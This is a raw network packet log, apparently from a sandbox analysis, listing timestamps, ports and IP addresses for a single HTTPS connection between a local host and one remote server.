Feb 14, 2024 09:08:18.187760115 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.187773943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.187802076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.187820911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.188649893 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.188690901 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.188720942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.188730955 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.188756943 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.188777924 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.189704895 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.189743042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.189775944 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.189793110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.189814091 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.189831018 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.190614939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.190665960 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.190692902 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.190706015 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.190730095 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.190748930 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.192245007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.192296028 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.192332983 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.192353964 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.192370892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.192394972 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.193176985 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.193216085 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.193247080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.193264008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.193289042 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.193305016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.194173098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.194219112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.194251060 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.194267988 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.194293976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.194313049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.195703030 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.195755959 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.195795059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.195818901 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.195837021 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.195861101 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.196569920 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.196609020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.196636915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.196654081 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.196675062 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.196691990 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.197504044 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.197550058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.197586060 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.197607040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.197627068 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.197650909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.198338985 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.198381901 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.198410988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.198429108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.198451996 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.198462963 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.199445963 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.199486971 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.199520111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.199544907 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.199558973 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.199573994 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.200660944 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.200700998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.200732946 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.200750113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.200779915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.200799942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.201731920 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.201771975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.201802015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.201818943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.201837063 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.201858044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.202666998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.202704906 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.202745914 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.202760935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.202781916 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.202800989 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.203614950 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.203659058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.203684092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.203701019 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.203722000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.203738928 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.204705954 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.204744101 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.204773903 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.204801083 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.204838991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.204838991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.205533028 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.205571890 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.205602884 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.205619097 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.205634117 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.205658913 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.206682920 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.206729889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.206767082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.206784010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.206801891 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.206825018 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.207695007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.207741976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.207772017 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.207793951 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.207812071 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.207835913 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.208709002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.208749056 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.208775043 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.208813906 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.208847046 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.208864927 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.209716082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.209757090 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.209794044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.209816933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.209835052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.209866047 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.210669994 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.210711002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.210743904 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.210767031 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.210787058 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.210805893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.211556911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.211596966 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.211626053 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.211641073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.211663961 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.211685896 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.212686062 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.212733984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.212789059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.212810040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.212826967 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.212852955 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.213756084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.213799000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.213828087 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.213848114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.213864088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.213901997 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.214801073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.214840889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.214936972 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.214956999 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.214986086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.215008020 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.215698957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.215738058 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.215801001 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.215822935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.215851068 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.215871096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.216548920 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.216588974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.216665030 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.216682911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.216713905 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.216738939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.217520952 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.217561007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.217688084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.217710018 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.217792988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.219156981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.219201088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.219249010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.219269991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.219288111 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.219314098 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.220233917 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.220282078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.220324993 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.220340014 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.220357895 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.220391035 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.220551968 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.220596075 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.220623016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.220664024 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.220716953 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.220738888 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.221530914 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.221570015 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.221601009 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.221613884 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.221637964 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.221659899 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.222465038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.222515106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.222547054 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.222558975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.222585917 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.222608089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.223262072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.223306894 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.223344088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.223355055 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.223380089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.223402023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.223438978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.223481894 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.223496914 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.223503113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.223541975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.224364042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.224404097 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.224433899 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.224447012 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.224458933 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.224482059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.225438118 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.225476980 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.225506067 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.225517035 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.225543022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.225563049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.226393938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.226443052 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.226470947 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.226490974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.226512909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.226530075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.226574898 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.226613998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.226639986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.226645947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.226672888 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.226695061 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.227554083 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.227591991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.227617979 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.227632999 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.227653980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.227674007 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.228388071 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.228434086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.228457928 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.228472948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.228492022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.228512049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.229322910 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.229362011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.229391098 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.229402065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.229424000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.229444027 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.230089903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.230129004 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.230158091 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.230170012 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.230195045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.230216026 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.230252028 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.230297089 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.230319977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.230324984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.230362892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.231375933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.231416941 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.231446028 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.231460094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.231472015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.231492043 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.232122898 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.232165098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.232188940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.232202053 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.232223034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.232244015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.232985973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.233025074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.233052015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.233061075 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.233088017 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.233108044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.233174086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.233218908 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.233243942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.233249903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.233278036 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.233299017 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.234150887 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.234195948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.234220028 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.234231949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.234260082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.234276056 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.235001087 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.235042095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.235065937 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.235075951 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.235104084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.235126019 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.236018896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.236057997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.236085892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.236099005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.236120939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.236141920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.236804962 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.236852884 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.236879110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.236887932 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.236913919 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.236937046 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.237067938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.237106085 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.237131119 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.237135887 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.237168074 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.237186909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.238034964 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.238075018 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.238095999 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.238107920 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.238132000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.238153934 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.238910913 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.238953114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.238986969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.238996983 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.239025116 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.239046097 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.239840984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.239878893 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.239908934 CET	49712	443	192.168.2.5	172.67.215.45
